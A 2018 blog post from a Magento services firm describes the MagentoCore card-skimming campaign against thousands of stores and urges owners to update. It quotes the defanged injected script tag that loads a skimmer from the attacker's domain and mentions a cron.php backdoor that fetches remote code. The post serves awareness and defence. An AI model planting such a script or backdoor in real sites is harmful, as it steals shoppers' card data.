Why is a Magento update so important?

11.09.2018 Angelika Siczek

Within half a year, criminals placed malicious scripts in over 7,000 stores based on the Magento engine. As a result of this practice, hackers stole customers’ credit card data, gaining access to their bank accounts.

aktualizacja magento

According to expert Willem de Groot, who discovered the threat, this is the most aggressive script of this type created so far in the case of Magento. Hackers have already infected 7 339 Magento stores with a skimmer called MagentoCore, which retrieves data from credit cards from users who shopped on these sites. The malicious script loads into the store’s cash register and steals the card data provided by users and sends it to the server controlled by the attacker. Willem de Groot reported that the hacker campaign includes a skimmer script loaded from the magentocore.net domain.

The campaign is still ongoing, and hackers are attacking new Magento stores at a rate of 50 to 60 websites per day. Among the infected stores are also companies listed on the stock exchange that are worth millions. 1450 out of over 7339 infected stores based on the Magento platform had a malicious script placed in the code for half a year. At that time, the attacked sites did not react to the data leak. The rest of the stores took on average a few weeks.

When the attacker manages to break the page code, he adds an embedded JavaScript snippet to the HTML template:

‘<script type = “text / javascript” src = “hxxps: //magentocore.net/mage/mage.js”> </ script>’

The script has the task of registering the placing of orders by customers and sends them to the server “magentocore.net”. The malicious software adds a backdoor to cron.php, which will periodically download malicious code, and after running it removes itself. According to Bleeping Computer, in which Yonathan Klijnsma, a RiskIQ Threat Researcher, is quoted, the MagentoCore campaign is part of a larger card theft campaign called MageCart, which has been active since the end of 2015.

According to de Groot, currently, 4.2% of all Magento stores are infected with one or more skimmers.

Have a question?

Write to us

Name*

Last Name*

Email*

Phone number*

Company*

I would like to sign a non-disclosure agreement (NDA)

Would you like to share some files?✕

PDF, DOC, DOCX, JPG lub PNG (max 5MB)

Message

I accept receiving marketing content by e-mail from Global4Net Sp. z o.o based in Wrocław. I am aware that I can unsubscribe at any time. More information about the processing of my data is available in the privacy policy.

Completing and sending the message with your personal data constitutes a response to your personal data by Global4Net Sp. z o.o based in Wrocław, to answer your question or inquiry. Sending a message is confirmation that you are aware that you have the opportunity to withdraw consent at any time. Additional information about the processing of available data is provided in the privacy policy.*

I want to receive marketing communication by phone from Global4Net Sp. z o.o based in Wrocław. I am aware that I can unsubscribe at any time. More information about the processing of my data is available in the privacy policy.

*Required